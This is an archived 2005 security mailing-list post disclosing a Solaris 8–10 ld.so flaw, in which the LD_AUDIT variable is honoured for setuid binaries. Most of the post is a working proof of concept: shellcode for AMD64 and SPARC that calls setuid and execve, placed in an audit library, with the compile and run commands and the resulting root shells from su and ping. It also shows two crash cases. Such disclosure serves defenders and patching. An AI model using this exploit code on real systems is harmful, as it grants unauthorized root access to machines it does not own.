Mailing-List: contact securesoftware-help@list.cr.yp.to; run by ezmlm Delivered-To: mailing list securesoftware@list.cr.yp.to Received: (qmail 97667 invoked from network); 28 Jun 2005 16:41:06 -0000 Received: from mailhost.freebsd.lublin.pl (193.138.118.4) by stoneport.math.uic.edu with SMTP; 28 Jun 2005 16:41:06 -0000 Received: from [192.168.1.100] (gw.frasunek.com [62.121.86.205]) by mailhost.freebsd.lublin.pl (8.13.1/8.13.1) with ESMTP id j5SGeLA1074383 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO) for ; Tue, 28 Jun 2005 18:40:27 +0200 (CEST) (envelope-from venglin@freebsd.lublin.pl) Message-ID: <42C17D70.3080403@freebsd.lublin.pl> Date: Tue, 28 Jun 2005 18:40:16 +0200 From: Przemyslaw Frasunek Organization: czuby.net User-Agent: Mozilla Thunderbird 1.0.2 (X11/20050626) X-Accept-Language: en-us, en MIME-Version: 1.0 To: securesoftware@list.cr.yp.to Subject: [local] [control] Solaris ld.so LD_AUDIT vulnerability Content-Type: text/plain; charset=ISO-8859-2 Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV 0.85.1/959/Tue Jun 28 01:00:06 2005 on mailhost.freebsd.lublin.pl X-Virus-Status: Clean X-Spam-Status: No, score=-1.8 required=5.0 tests=AWL,BAYES_00,SPF_FAIL, UPPERCASE_50_75 autolearn=no version=3.0.3 X-Spam-Checker-Version: SpamAssassin 3.0.3 (2005-04-27) on mailhost.freebsd.lublin.pl ld.so from Solaris 8, 9 and 10 doesn't check LD_AUDIT environment variable when running s[ug]id binaries, allowing to run arbitrary code with elevated privileges. This vulnerability was introduced by one of the recent patches for Solaris 9, possibly 112963. Ld.so patched with 112963-08 is not vulnerable -- it does not allow LD_AUDIT for set[ug]id binaries, but upgrading to 112963-16 or even latest 112963-19 definitly makes ld.so exploitable. Up-to-date Solaris 8 boxes are also vulnerable. Solaris 10 boxes are vulnerable, both patched and unpatched. Generic Solaris 8 and 9 are not vulnerable. Example on unpatched Solaris 10 (AMD64): atari:venglin:~> cat dupa.c static char sh[] = "\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff"; int la_version() { void (*f)(); f = (void*)sh; f(); return 3; } atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so atari:venglin:~> su # id uid=0(root) gid=10(staff) Solaris 9 on SPARC: $ cat dupa.c char sh[] = /* setuid() */ "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* execve() */ "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20" "\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14" "\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh"; int la_version() { void (*f)(); f = (void*)sh; f(); return 3; } $ gcc -fPIC -shared -o /tmp/dupa.so dupa.c $ export LD_AUDIT=/tmp/dupa.so $ ping # id uid=0(root) gid=100(student) Additionally, we have two segfaults: atari:venglin:~> setenv LD_AUDIT : atari:venglin:~> su Segmentation fault atari:venglin:~> unsetenv LD_AUDIT atari:venglin:~> setenv LD_AUDIT `perl -e 'print "A"x1024'` atari:venglin:~> su ld.so.1: su: warning: su: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: path name too long ld.so.1: su: warning: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: audit initialization failure: disabled Segmentation fault Both of them are NULL pointer dereferences. The first example works on Solaris 8, 9 and 10. Second one - only on Solaris 10. For now, it doesn't seem to be exploitable. -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE * * JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *